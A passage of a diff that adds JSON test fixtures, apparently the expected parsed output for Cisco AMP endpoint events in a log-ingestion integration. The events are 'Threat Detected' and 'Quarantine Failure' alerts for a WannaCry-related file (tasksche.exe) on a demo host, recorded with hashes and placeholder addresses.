+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275394960065000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064596",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843778667Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419275394960065000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419275394960064594",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843780555Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064606",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843782466Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064605",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843784355Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064607",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843786245Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064604",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843788123Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064603",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843790009Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419275394960065000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419275394960064602",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:39:50.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
